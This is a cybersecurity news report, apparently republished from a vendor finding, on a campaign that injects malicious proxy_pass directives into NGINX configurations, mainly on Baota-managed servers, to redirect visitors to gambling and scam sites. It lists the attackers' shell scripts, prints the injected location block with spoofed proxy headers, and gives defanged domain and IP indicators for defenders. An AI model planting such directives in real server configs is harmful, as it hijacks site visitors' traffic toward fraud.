A sophisticated campaign in which threat actors are stealthily compromising NGINX servers to redirect web traffic to malicious destinations.
The attackers, previously linked to “React2Shell” exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, widely used in Asia.
How the Attack Works
Instead of installing traditional malware, these attackers modify the server’s legitimate configuration files.
By injecting malicious directives into NGINX’s location blocks, they can intercept user traffic and route it through attacker-controlled servers without the site owner noticing immediately.
NGINX attack flow diagram (source: Datadog Security Labs)
The core of the attack relies on the proxy_pass directive. This standard NGINX feature is designed to forward traffic to backend servers (like a PHP application).
The campaign uses a straightforward, automated workflow involving several shell scripts:
Script Name RolePrimary FunctionTarget zx.shThe OrchestratorInitializes environment and downloads required toolsActs as entry point for the attack chainbt.shBaota InjectorScans for Baota panel configs and injects malicious codeTargets /www/server/panel/vhost/nginx4zdh.shAdvanced InjectionInjects payload into NGINX configs after validationTargets generic Linux NGINX installszdh.shAdvanced InjectionSame as 4zdh.sh with config verificationCollects and uploads the hijacked domain listok.shExfiltrationActs as an entry point for the attack chainSends data to attacker C2 server
However, the attackers reconfigure it to send users to their own malicious domains, such as gambling or scam sites.
They also use proxy_set_header to ensure the hijacked traffic retains legitimate-looking headers, making the redirection harder to detect in standard logs.
location /%PATH%/ {
set $fullurl “$scheme://$host$request_uri”;
rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
proxy_set_header Host [Attacker_Domain];
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header User-Agent $http_user_agent;
proxy_set_header Referer $http_referer;
proxy_ssl_server_name on;
proxy_pass
}
The campaign heavily targets Asian Top-Level Domains (TLDs) like .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites.
Datadog Security Research advises administrators to check their NGINX configuration files for unexpected proxy_pass directives pointing to the following known malicious domains:
Indicator TypeValueThreat CategoryStatusNotesDomainxzz.pier46[.]comSuspected C2 / Malware InfrastructureActive (unverified)Observed in malicious campaignDomainide.hashbank8[.]comSuspected C2 / Malware InfrastructureActive (unverified)Used for attacker communicationsDomainth.cogicpt[.]orgSuspected C2 / Malware InfrastructureActive (unverified)Potential exfiltration endpoint
Additionally, network logs showing traffic to IP 158.94.210[.]227 indicate active communication with the attackers’ infrastructure.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers appeared first on Cyber Security News.
